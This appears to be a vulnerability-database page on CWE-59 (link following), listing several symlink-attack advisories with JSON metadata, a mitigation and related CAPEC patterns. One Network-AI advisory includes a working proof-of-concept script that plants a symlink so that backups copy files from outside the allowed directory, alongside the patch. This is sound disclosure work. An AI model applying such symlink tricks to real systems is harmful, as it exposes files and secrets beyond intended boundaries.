Common Weakness Enumeration

CWE-59

Allowed

Improper Link Resolution Before File Access ('Link Following')

Abstraction: Base · Status: Draft

The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

1985 vulnerabilities reference this CWE, most recent first.

GHSA-6VJJ-WJQ4-W7HV

Vulnerability from github – Published: 2022-05-02 06:19 – Updated: 2022-05-02 06:19
VLAI
Details

Certain patch-installation scripts in Oracle Solaris allow local users to append data to arbitrary files via a symlink attack on the /tmp/CLEANUP temporary file, related to use of Update Manager.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2010-1183"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2010-03-29T22:30:00Z",
    "severity": "LOW"
  },
  "details": "Certain patch-installation scripts in Oracle Solaris allow local users to append data to arbitrary files via a symlink attack on the /tmp/CLEANUP temporary file, related to use of Update Manager.",
  "id": "GHSA-6vjj-wjq4-w7hv",
  "modified": "2022-05-02T06:19:58Z",
  "published": "2022-05-02T06:19:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1183"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/57149"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/510305/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/510311/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/38928"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-6VWQ-GG49-HJ9W

Vulnerability from github – Published: 2024-10-11 15:30 – Updated: 2024-10-12 00:30
VLAI
Details

The Improper link resolution before file access ('Link Following') vulnerability in SonicWall Connect Tunnel (version 12.4.3.271 and earlier of Windows client) allows users with standard privileges to delete arbitrary folders and files, potentially leading to local privilege escalation attack.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-45316"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-11T13:15:16Z",
    "severity": "HIGH"
  },
  "details": "The Improper link resolution before file access (\u0027Link Following\u0027) vulnerability in SonicWall Connect Tunnel (version 12.4.3.271 and earlier of Windows client) allows users with standard privileges to delete arbitrary folders and files, potentially leading to local privilege escalation attack.",
  "id": "GHSA-6vwq-gg49-hj9w",
  "modified": "2024-10-12T00:30:47Z",
  "published": "2024-10-11T15:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45316"
    },
    {
      "type": "WEB",
      "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0017"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6WGP-VX5W-7923

Vulnerability from github – Published: 2022-05-17 05:53 – Updated: 2022-05-17 05:53
VLAI
Details

editcomment in crip 3.7 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/*.tag.tmp temporary file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-5376"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2008-12-08T23:30:00Z",
    "severity": "MODERATE"
  },
  "details": "editcomment in crip 3.7 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/*.tag.tmp temporary file.",
  "id": "GHSA-6wgp-vx5w-7923",
  "modified": "2022-05-17T05:53:18Z",
  "published": "2022-05-17T05:53:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-5376"
    },
    {
      "type": "WEB",
      "url": "http://lists.debian.org/debian-devel/2008/08/msg00347.html"
    },
    {
      "type": "WEB",
      "url": "http://uvw.ru/report.sid.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-6WW7-MX3F-8CQ3

Vulnerability from github – Published: 2022-05-02 04:00 – Updated: 2025-04-11 03:48
VLAI
Details

The (1) configure and (2) config.guess scripts in GNU troff (aka groff) 1.20.1 on Openwall GNU/*/Linux (aka Owl) improperly create temporary files upon a failure of the mktemp function, which makes it easier for local users to overwrite arbitrary files via a symlink attack on a temporary file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2009-5082"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2011-06-30T15:55:00Z",
    "severity": "LOW"
  },
  "details": "The (1) configure and (2) config.guess scripts in GNU troff (aka groff) 1.20.1 on Openwall GNU/*/Linux (aka Owl) improperly create temporary files upon a failure of the mktemp function, which makes it easier for local users to overwrite arbitrary files via a symlink attack on a temporary file.",
  "id": "GHSA-6ww7-mx3f-8cq3",
  "modified": "2025-04-11T03:48:11Z",
  "published": "2022-05-02T04:00:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-5082"
    },
    {
      "type": "WEB",
      "url": "http://cvsweb.openwall.com/cgi/cvsweb.cgi/Owl/packages/groff/groff-1.20.1-owl-tmp.diff"
    },
    {
      "type": "WEB",
      "url": "http://cvsweb.openwall.com/cgi/cvsweb.cgi/Owl/packages/groff/groff-1.20.1-owl-tmp.diff.diff?r1=1.1%3Br2=1.2%3Bf=h"
    },
    {
      "type": "WEB",
      "url": "http://cvsweb.openwall.com/cgi/cvsweb.cgi/Owl/packages/groff/groff-1.20.1-owl-tmp.diff.diff?r1=1.1;r2=1.2;f=h"
    },
    {
      "type": "WEB",
      "url": "http://openwall.com/lists/oss-security/2009/08/14/4"
    },
    {
      "type": "WEB",
      "url": "http://openwall.com/lists/oss-security/2009/08/14/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-6X2M-P4XP-WG22

Vulnerability from github – Published: 2026-06-19 21:42 – Updated: 2026-06-19 21:42
VLAI
Summary
Network-AI: EnvironmentManager.backup() follows symlinked directories and copies files outside the environment root into backups
Details

Summary

EnvironmentManager.backup() recursively collects files using _collectBackupFiles(). _collectBackupFiles() uses statSync(full), which follows symlinks. If data/<env> contains a symlink to a directory outside the environment root, backup recursion follows the symlink and copies external files into data/<env>/.backups/<backupId>/.

An attacker who can place a symlink under the environment data directory can cause backup operations to disclose files outside the environment root into backup artifacts. Confirmed in Network-AI 5.12.1.

Details

backup() collects file paths and copies them into the backup directory:

const files = this._collectBackupFiles(envDir);
for (const rel of files) {
  const src = join(envDir, rel);
  const dst = join(backupPath, rel);
  mkdirSync(join(backupPath, rel.includes('/') ? rel.substring(0, rel.lastIndexOf('/')) : '.'), { recursive: true });
  try { copyFileSync(src, dst); } catch { /* skip unreadable */ }
}

_collectBackupFiles() follows symlinked directories because it calls statSync(), not lstatSync():

const info = statSync(full);
if (info.isDirectory()) {
  walk(full, rel);
} else {
  results.push(rel);
}

Default CLI reachability exists through network-ai env backup create --env <env>. backup() also runs automatically before promotion and restore operations.

Affected source evidence:

  • lib/env-manager.ts:435-460 — backup copy logic.
  • lib/env-manager.ts:596-617 — symlink-following _collectBackupFiles().
  • bin/cli.ts:413-420 — default CLI exposes backup creation.
  • lib/env-manager.ts:294-297 and 483-484 — backup also runs before promote/restore.

PoC

This PoC uses only temporary files. It creates a symlink inside data/dev pointing to an external directory, then runs backup('dev') and observes that the external file is copied into the backup:

TMP=$(mktemp -d)
TMPBASE="$TMP" node -r ts-node/register/transpile-only - <<'TS'
const { EnvironmentManager } = require('./lib/env-manager');
const fs = require('fs');
const path = require('path');
const base = process.env.TMPBASE;
const data = path.join(base, 'data');
const outside = path.join(base, 'outside');

fs.mkdirSync(outside, { recursive: true });
fs.writeFileSync(path.join(outside, 'secret.txt'), 'secret-through-symlink');

const mgr = new EnvironmentManager(data, {
  chain: ['dev', 'st'],
  gates: { dev: 'auto', st: 'auto' },
});

mgr.init('dev');
fs.symlinkSync(outside, path.join(data, 'dev', 'linked-outside'), 'dir');

const result = mgr.backup('dev');
const copied = path.join(result.path, 'linked-outside', 'secret.txt');

console.log(JSON.stringify({
  copied: fs.existsSync(copied),
  content: fs.readFileSync(copied, 'utf8'),
}, null, 2));

fs.rmSync(base, { recursive: true, force: true });
TS

Observed result: copied is true and content is secret-through-symlink.

Impact

An attacker who can place a symlink in data/<env> can cause backup creation to copy arbitrary readable files from outside the environment root into data/<env>/.backups/<backupId>/. This can disclose secrets or local files to any actor/process that can later read or export Network-AI backup artifacts. No RCE chain was confirmed.


Resolution (maintainer)

Fixed in v5.12.2 (commit a59c13a). Install: npm install network-ai@5.12.2 — published to npm with provenance.

_collectBackupFiles() now uses lstatSync instead of statSync and skips any entry where isSymbolicLink() is true. Symlinks are never traversed, so backup() can no longer follow a link out of the environment root and copy external files into a backup artifact.

All 3,269 tests pass against the patched build. Thanks to @sondt99 for the responsible disclosure.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.12.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "network-ai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.12.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T21:42:36Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n`EnvironmentManager.backup()` recursively collects files using `_collectBackupFiles()`. `_collectBackupFiles()` uses `statSync(full)`, which follows symlinks. If `data/\u003cenv\u003e` contains a symlink to a directory outside the environment root, backup recursion follows the symlink and copies external files into `data/\u003cenv\u003e/.backups/\u003cbackupId\u003e/`.\n\nAn attacker who can place a symlink under the environment data directory can cause backup operations to disclose files outside the environment root into backup artifacts. Confirmed in Network-AI 5.12.1.\n\n### Details\n`backup()` collects file paths and copies them into the backup directory:\n\n```ts\nconst files = this._collectBackupFiles(envDir);\nfor (const rel of files) {\n  const src = join(envDir, rel);\n  const dst = join(backupPath, rel);\n  mkdirSync(join(backupPath, rel.includes(\u0027/\u0027) ? rel.substring(0, rel.lastIndexOf(\u0027/\u0027)) : \u0027.\u0027), { recursive: true });\n  try { copyFileSync(src, dst); } catch { /* skip unreadable */ }\n}\n```\n\n`_collectBackupFiles()` follows symlinked directories because it calls `statSync()`, not `lstatSync()`:\n\n```ts\nconst info = statSync(full);\nif (info.isDirectory()) {\n  walk(full, rel);\n} else {\n  results.push(rel);\n}\n```\n\nDefault CLI reachability exists through `network-ai env backup create --env \u003cenv\u003e`. `backup()` also runs automatically before promotion and restore operations.\n\nAffected source evidence:\n\n- `lib/env-manager.ts:435-460` \u2014 backup copy logic.\n- `lib/env-manager.ts:596-617` \u2014 symlink-following `_collectBackupFiles()`.\n- `bin/cli.ts:413-420` \u2014 default CLI exposes backup creation.\n- `lib/env-manager.ts:294-297` and `483-484` \u2014 backup also runs before promote/restore.\n\n### PoC\nThis PoC uses only temporary files. It creates a symlink inside `data/dev` pointing to an external directory, then runs `backup(\u0027dev\u0027)` and observes that the external file is copied into the backup:\n\n```bash\nTMP=$(mktemp -d)\nTMPBASE=\"$TMP\" node -r ts-node/register/transpile-only - \u003c\u003c\u0027TS\u0027\nconst { EnvironmentManager } = require(\u0027./lib/env-manager\u0027);\nconst fs = require(\u0027fs\u0027);\nconst path = require(\u0027path\u0027);\nconst base = process.env.TMPBASE;\nconst data = path.join(base, \u0027data\u0027);\nconst outside = path.join(base, \u0027outside\u0027);\n\nfs.mkdirSync(outside, { recursive: true });\nfs.writeFileSync(path.join(outside, \u0027secret.txt\u0027), \u0027secret-through-symlink\u0027);\n\nconst mgr = new EnvironmentManager(data, {\n  chain: [\u0027dev\u0027, \u0027st\u0027],\n  gates: { dev: \u0027auto\u0027, st: \u0027auto\u0027 },\n});\n\nmgr.init(\u0027dev\u0027);\nfs.symlinkSync(outside, path.join(data, \u0027dev\u0027, \u0027linked-outside\u0027), \u0027dir\u0027);\n\nconst result = mgr.backup(\u0027dev\u0027);\nconst copied = path.join(result.path, \u0027linked-outside\u0027, \u0027secret.txt\u0027);\n\nconsole.log(JSON.stringify({\n  copied: fs.existsSync(copied),\n  content: fs.readFileSync(copied, \u0027utf8\u0027),\n}, null, 2));\n\nfs.rmSync(base, { recursive: true, force: true });\nTS\n```\n\nObserved result: `copied` is `true` and `content` is `secret-through-symlink`.\n\n### Impact\nAn attacker who can place a symlink in `data/\u003cenv\u003e` can cause backup creation to copy arbitrary readable files from outside the environment root into `data/\u003cenv\u003e/.backups/\u003cbackupId\u003e/`. This can disclose secrets or local files to any actor/process that can later read or export Network-AI backup artifacts. No RCE chain was confirmed.\n\n\n---\n\n### Resolution (maintainer)\n\n**Fixed in [v5.12.2](https://github.com/Jovancoding/Network-AI/releases/tag/v5.12.2) (commit `a59c13a`).** Install: `npm install network-ai@5.12.2` \u2014 published to npm with provenance.\n\n`_collectBackupFiles()` now uses `lstatSync` instead of `statSync` and skips any entry where `isSymbolicLink()` is true. Symlinks are never traversed, so `backup()` can no longer follow a link out of the environment root and copy external files into a backup artifact.\n\nAll 3,269 tests pass against the patched build. Thanks to @sondt99 for the responsible disclosure.",
  "id": "GHSA-6x2m-p4xp-wg22",
  "modified": "2026-06-19T21:42:36Z",
  "published": "2026-06-19T21:42:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/security/advisories/GHSA-6x2m-p4xp-wg22"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/commit/a59c13a1f0ce0e8a0779a90343eef92fac5ab4c3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Jovancoding/Network-AI"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/releases/tag/v5.12.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Network-AI: EnvironmentManager.backup() follows symlinked directories and copies files outside the environment root into backups"
}

GHSA-6XWQ-H856-Q7W6

Vulnerability from github – Published: 2022-05-17 02:18 – Updated: 2022-05-17 02:18
VLAI
Details

asciiview in aview 1.3.0 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/aview#####.pgm temporary file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-4935"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2008-11-05T15:00:00Z",
    "severity": "MODERATE"
  },
  "details": "asciiview in aview 1.3.0 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/aview#####.pgm temporary file.",
  "id": "GHSA-6xwq-h856-q7w6",
  "modified": "2022-05-17T02:18:33Z",
  "published": "2022-05-17T02:18:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-4935"
    },
    {
      "type": "WEB",
      "url": "https://bugs.gentoo.org/235808"
    },
    {
      "type": "WEB",
      "url": "https://bugs.gentoo.org/show_bug.cgi?id=235770"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44837"
    },
    {
      "type": "WEB",
      "url": "http://bugs.debian.org/496422"
    },
    {
      "type": "WEB",
      "url": "http://dev.gentoo.org/~rbu/security/debiantemp/aview"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/33139"
    },
    {
      "type": "WEB",
      "url": "http://security.gentoo.org/glsa/glsa-200812-14.xml"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2008/10/30/2"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/30885"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-72F3-WX74-78WC

Vulnerability from github – Published: 2026-07-03 15:31 – Updated: 2026-07-03 15:31
VLAI
Details

Dell PowerProtect Data Domain, versions 7.7.1.0 through 8.6, LTS2026 release version 8.6.1.0 through 8.6.1.10, LTS2025 release version 8.3.1.0 through 8.3.1.30, LTS2024 release versions 7.13.1.0 through 7.13.1.70 contain an improper link resolution before file access ('link following') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-44269"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-03T13:17:15Z",
    "severity": "MODERATE"
  },
  "details": "Dell PowerProtect Data Domain, versions 7.7.1.0 through 8.6, LTS2026 release version 8.6.1.0 through 8.6.1.10, LTS2025 release version 8.3.1.0 through 8.3.1.30, LTS2024 release versions 7.13.1.0 through 7.13.1.70 contain an improper link resolution before file access (\u0027link following\u0027) vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.",
  "id": "GHSA-72f3-wx74-78wc",
  "modified": "2026-07-03T15:31:57Z",
  "published": "2026-07-03T15:31:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44269"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000481268/dsa-2026-278-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-72FC-7PFF-VV9C

Vulnerability from github – Published: 2024-12-18 03:31 – Updated: 2024-12-18 03:31
VLAI
Details

Dell Inventory Collector Client, versions prior to 12.7.0, contains an Improper Link Resolution Before File Access vulnerability. A low-privilege attacker with local access may exploit this vulnerability, potentially resulting in Elevation of Privileges and unauthorized file system access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-47480"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59",
      "CWE-61"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-18T03:15:26Z",
    "severity": "HIGH"
  },
  "details": "Dell Inventory Collector Client, versions prior to 12.7.0, contains an Improper Link Resolution Before File Access vulnerability. A low-privilege attacker with local access may exploit this vulnerability, potentially resulting in Elevation of Privileges and unauthorized file system access.",
  "id": "GHSA-72fc-7pff-vv9c",
  "modified": "2024-12-18T03:31:47Z",
  "published": "2024-12-18T03:31:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47480"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000255700/dsa-2024-475"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7327-V742-4QWR

Vulnerability from github – Published: 2025-07-08 09:31 – Updated: 2025-07-08 09:31
VLAI
Details

A low privileged remote attacker with file access can replace a critical file used by the arp-preinit script to get read, write and execute access to any file on the device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-41667"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-08T07:15:25Z",
    "severity": "HIGH"
  },
  "details": "A low privileged remote attacker with file access can replace a critical file used by the arp-preinit script to get read, write and execute access to any file on the device.",
  "id": "GHSA-7327-v742-4qwr",
  "modified": "2025-07-08T09:31:29Z",
  "published": "2025-07-08T09:31:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41667"
    },
    {
      "type": "WEB",
      "url": "https://certvde.com/en/advisories/VDE-2025-054"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-734J-49W9-7RXV

Vulnerability from github – Published: 2026-03-02 21:31 – Updated: 2026-03-06 06:30
VLAI
Details

In multiple locations, there is a possible way to delete media without the MANAGE_EXTERNAL_STORAGE permission due to an intent redirect. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-48582"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-02T19:16:26Z",
    "severity": "HIGH"
  },
  "details": "In multiple locations, there is a possible way to delete media without the MANAGE_EXTERNAL_STORAGE permission due to an intent redirect. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.",
  "id": "GHSA-734j-49w9-7rxv",
  "modified": "2026-03-06T06:30:29Z",
  "published": "2026-03-02T21:31:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48582"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/docs/security/bulletin/2026/2026-03-01"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2026-03-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-48.1
Architecture and Design

Strategy: Separation of Privilege

  • Follow the principle of least privilege when assigning access rights to entities in a software system.
  • Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-132: Symlink Attack

An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.

CAPEC-17: Using Malicious Files

An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.